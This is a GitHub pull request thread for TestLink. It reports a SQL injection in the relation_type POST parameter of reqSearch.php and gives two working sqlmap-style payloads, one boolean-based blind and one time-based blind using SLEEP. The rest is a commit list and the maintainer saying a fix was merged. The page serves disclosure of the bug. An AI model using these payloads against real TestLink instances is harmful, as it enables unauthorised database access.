Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

testlink 1.9.19 guest user sql inject #239

Closed
wants to merge 39 commits into from
Closed

testlink 1.9.19 guest user sql inject #239

wants to merge 39 commits into from

Conversation

ver007
Copy link

@ver007 ver007 commented Jan 10, 2020

POST: /testlink/lib/requirements/reqSearch.php
: relation_type=11*

Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: *************************************relation_type=(SELECT (CASE WHEN (6355=6355) THEN 11 ELSE (SELECT 1818 UNION SELECT 4655) END))*************************************

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: *******************relation_type=11 AND (SELECT 1253 FROM (SELECT(SLEEP(5)))jgBC)*************************************

Since CVE does not accept it, it can only be sent here

TestLink Jira and others added 30 commits January 25, 2019 22:39
fixed $tlCfg->testcase_cfg->downloadOnlyAfterExec NOT applied to old …
c7f4afb 
…versions
@fmancardi
missing $doLink = false;, when latestVersionHasBeenExecuted() > 0
7a4e247
@fmancardi
Revert "missing $doLink = false;, when latestVersionHasBeenExecuted()…
01b5915 
… > 0"

This reverts commit 7a4e247.
@fmancardi
missing $doLink = false;, when latestVersionHasBeenExecuted() > 0
bf2ac36
@fmancardi
PHP 7 crash due to initializeGUI() arguments number
e1b44d4
@fmancardi
.#0008556: ''DB Access Error'', when clicked on "Test Suite Document …
3c91487 
…(HTML) on New Window''
@fmancardi
Fixed: TestLink event viewer error related to drawControlsOnTop
cd4f57e
@fmancardi
typo error whitelists => whitelist
cde8306
@fmancardi
TestLink event viewer warnings
ea0c219
@fmancardi
Refactoring to avoid warnings in TestLink event viewer
8efa5b6
@fmancardi
PHP countable error
0e0c13a
@fmancardi
. #8575: test report - attachment image
d213c11
@fmancardi
XSS
0c439d3
@fmancardi
. # 0008588: Failed to delete the keywords
7f07e1a
@fmancardi
. #0008480: Tables Prefix throws an SQL exception at installation
d0fb5b1
@fmancardi
.#0008602: Test Case Version Relations not displayed on Test Case Ver…
028df47 
…sion Execution Feature
@fmancardi
typo error getTCVRelations => getTCVersionRelations
f679249
@fmancardi
fix: #0008632: Custom CSS configuration is broken
f78f774
@fmancardi
fix: multiple blanks in test steps exec menu
370d605
@fmancardi
setup for squash.io
187f8e1
@fmancardi
fix: #0008770: Uknown PHP sprtinf called
e2a6583
@fmancardi
Revert "fix: #0008770: Uknown PHP sprtinf called"
5f041fa 
This reverts commit e2a6583.
@fmancardi
fix: #0008770: Uknown PHP sprtinf
814300d
@fmancardi
fix: tcImport missing variables
afe8304
@fmancardi
SECURITY
b8af640 
CWE-79: Improper Neutralization of Input  During Web Page Generation ('Cross-site Scripting')
https://cxsecurity.com/issue/WLB-2019110139
@fmancardi
SECURITY
8546769 
CWE-79: Improper Neutralization of Input  During Web Page Generation ('Cross-site Scripting')
https://cxsecurity.com/issue/WLB-2019110139
@fmancardi
SECURITY
6378eeb 
CWE-79: Improper Neutralization of Input  During Web Page Generation ('Cross-site Scripting')
https://cxsecurity.com/issue/WLB-2019110139
@fmancardi
fix on post variables check
8fce18e
@fmancardi
fix #0008733: Database error on installation.
b0c63d6
@fmancardi
fix create object from empty
2d2c06f
@squash-labs
Copy link

squash-labs bot commented Jan 10, 2020

Manage this branch in Squash

Test this branch here: https://tl191901-0fpcb.squash.io

@fmancardi
Copy link
Contributor

please retry with this
fcf52a9

@fmancardi
Copy link
Contributor

merged manually

@fmancardi fmancardi closed this Jan 12, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
2 participants
@ver007 @fmancardi